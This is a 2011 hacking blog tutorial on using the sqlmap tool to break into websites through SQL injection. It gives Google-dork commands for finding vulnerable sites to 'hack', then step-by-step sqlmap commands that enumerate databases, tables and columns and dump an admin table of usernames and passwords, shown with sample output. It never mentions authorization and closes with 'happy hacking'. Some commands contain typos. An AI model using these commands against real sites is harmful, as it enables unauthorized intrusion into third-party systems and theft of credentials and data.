Chitika

Wednesday 7 December 2011

SQLMAP USAGE




Hello this is hackracer From network laugh (networklaugh.blogspot.com)
In this tutorial i will show u how to use SQLMAP 
sqlmap is a automate tool for sql injecting a site 
This is the first tutorial of mine in this site 
Alright lets begin
i recommend you to use SQLMAP in linux it can be used in windows too but its good to use it in linux
Ok SQLMAP is written in python so for running it u need to have ptyhon installed 
in pentesting distro of linux like blacktra or backbox or blackubutu
u will find it already installed 
ohk we were on python for windows user you can download python from


WINDOWS : http://www.activestate.com/activepython/downloads ITS FREE 
For linux u can use this comman


LINUX: sudo apt-get install python


and then u need to download SQLMAP
u can download it from 


sqlmap.sourceforge.net

its an opensource tool 
ohk now running it 
now we need a vul site of find it vai sql map 
SEARCHING VULNERABLE SITE VAI SQLMAP OR SCANNING THE SITE YOU WANNA HACK
TO FIND SQL INJECTION VULNERABLE SITE 
You can use this command

python sqlmap.py -g "site:siteyouwannahack.com"


(NOTE: SQLMAP USAGE : python sqlmap.py [command] ,in some case u may have to run it by 
sqlmap [comman] or python ./sqlmap.py [command]
FINDING SQLI VULNERABLE SITE USING GOOGLE DORK 
You can use this command 


python sqlmap.py -g "inurl:index.php?id="


Ohk now lets expliot an vulnerable site
i assume that u alrady have a vulnerable site :) HACKRACER :D


LETS START 
to start 
python sqlmap.py -u yourtarget.com --dbs 




ohk i will explain wat this command means 
python sqlmap: this is for running the sqlmap 
-u: command for URL (address)
--dbs : for finding the blackend database 
you will find the database 


Database: DATABASE++++++++++++++++++++|database          |++++++++++++++++++++


now we need to find the tables 
to find the tables we have to use -D [database] and --tables [tables]


python sqlmap.py -u yourtarget.com -D nameofdatabase --tables 
here comes the tables :D 


Database: DATABASETable: admin+++++++++++++++++++admin           ++members         ++user            + ++++++++++++++++++
ohkiee we got the tables ah now we need to find the colums 
to find the columns we have to use -D [databasename] -T [table name] and --columns [columns]


python sqmmap.py -u yourtarget.com -D nameofdatabase -T admin --columns
is that looks like that 
Database: databaseTable: admin++++++++++++++++++++++++++++| ID | USERNAME | PASSWORD +++++++++++++++++++++++++++++| 1  | ADMIN    | 123456   + ++++++++++++++++++++++++++++


here you got now you have the username and pass :D 
you can even dump the whole database by 


python sqlmap.py -u yourtargetsite.com -D database -T tablename -C columnname --dump 
this tutorial is written by hackracer frm networklaugh.bloagspot.com
all credit goes to me so fuck you if u copy paste this tutorials 


:D happy hacking and be save


INDIAN STEALTH ASSAINS

Posted by at
Labels: , , , , , , , , , , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)